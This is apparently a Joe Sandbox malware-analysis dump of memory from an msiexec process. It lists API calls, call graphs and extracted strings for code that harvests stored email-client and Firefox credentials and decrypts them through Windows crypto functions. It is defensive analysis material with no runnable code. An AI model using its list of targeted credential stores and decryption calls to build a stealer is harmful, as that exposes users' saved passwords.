                                                                                                      control_flow_graph 348 410dbb-410dd2 call 410d0e 351 410dd4-410ddd call 4070ae 348->351 352 410dfd-410e1b memset 348->352 359 410ddf-410de2 351->359 360 410dee-410df1 351->360 353 410e27-410e35 352->353 354 410e1d-410e20 352->354 357 410e45-410e4f call 410a9c 353->357 354->353 356 410e22-410e25 354->356 356->353 361 410e37-410e40 356->361 367 410e51-410e76 call 410d3d call 410add 357->367 368 410e7f-410e92 _mbscpy 357->368 359->352 363 410de4-410de7 359->363 366 410df8 360->366 361->357 363->352 365 410de9-410dec 363->365 365->352 365->360 369 410e95-410e97 366->369 367->368 368->369
                                                                                                      APIs
                                                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                      • memset.MSVCRT ref: 00410E10
                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$`{/h

                                                                                                      APIs
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                      • memset.MSVCRT ref: 00408620
                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                      • memset.MSVCRT ref: 00408671
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharMulusermeWidestrlen$ComputerEnumUser
                                                                                                      • String ID: Software\Google\Google Talk\Accounts$`{/h

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004109F7
                                                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                      • memset.MSVCRT ref: 00410A32
                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@

                                                                                                      APIs
                                                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                      • String ID: /stext
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      APIs
                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      APIs
                                                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                      • String ID: (yE$(yE$(yE
                                                                                                      Similarity
                                                                                                      • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                      • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040EBD8
                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                      • memset.MSVCRT ref: 0040EC2B
                                                                                                      • memset.MSVCRT ref: 0040EC47
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                      • memset.MSVCRT ref: 0040ECDD
                                                                                                      • memset.MSVCRT ref: 0040ECF2
                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                      • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                      • memset.MSVCRT ref: 0040EDE1
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                      • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                      • memset.MSVCRT ref: 0040E736
                                                                                                      • memset.MSVCRT ref: 0040E74F
                                                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                      • memset.MSVCRT ref: 0040E858
                                                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                      • GetDC.USER32 ref: 004104E2
                                                                                                      • strlen.MSVCRT ref: 00410522
                                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                      • sprintf.MSVCRT ref: 00410640
                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004024F5
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,682F7B60,?,00000000), ref: 00402533
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                      • API String ID: 168965057-606283353
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00402869
                                                                                                        • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                      • _mbscpy.MSVCRT(?,?,682F7B60,?,00000000), ref: 004028A3
                                                                                                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,682F7B60,?,00000000), ref: 0040297B
                                                                                                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                      • API String ID: 1497257669-167382505
                                                                                                      APIs
                                                                                                      • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                      • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                      • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                      • memset.MSVCRT ref: 0040FCFD
                                                                                                      • memset.MSVCRT ref: 0040FD1D
                                                                                                      • memset.MSVCRT ref: 0040FD3B
                                                                                                      • memset.MSVCRT ref: 0040FD54
                                                                                                      • memset.MSVCRT ref: 0040FD72
                                                                                                      • memset.MSVCRT ref: 0040FD8B
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                      • memset.MSVCRT ref: 0040FE45
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                      • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                      • sprintf.MSVCRT ref: 0040FF0F
                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                      • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                      Strings
                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                      • {Unknown}, xrefs: 0040FD02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                      • API String ID: 1428123949-3474136107
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2998058495-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                        • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                      • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                      • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                      • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                      • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                      • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                      • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                                      • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                      • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                      • strlen.MSVCRT ref: 0040BEFE
                                                                                                      • strlen.MSVCRT ref: 0040BF0C
                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                        • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                        • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                      • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                      • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                      • memset.MSVCRT ref: 0040BFDB
                                                                                                      • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                      • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                      • API String ID: 2303586283-933021314
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                      • API String ID: 231171946-2189169393
                                                                                                      APIs
                                                                                                      Strings
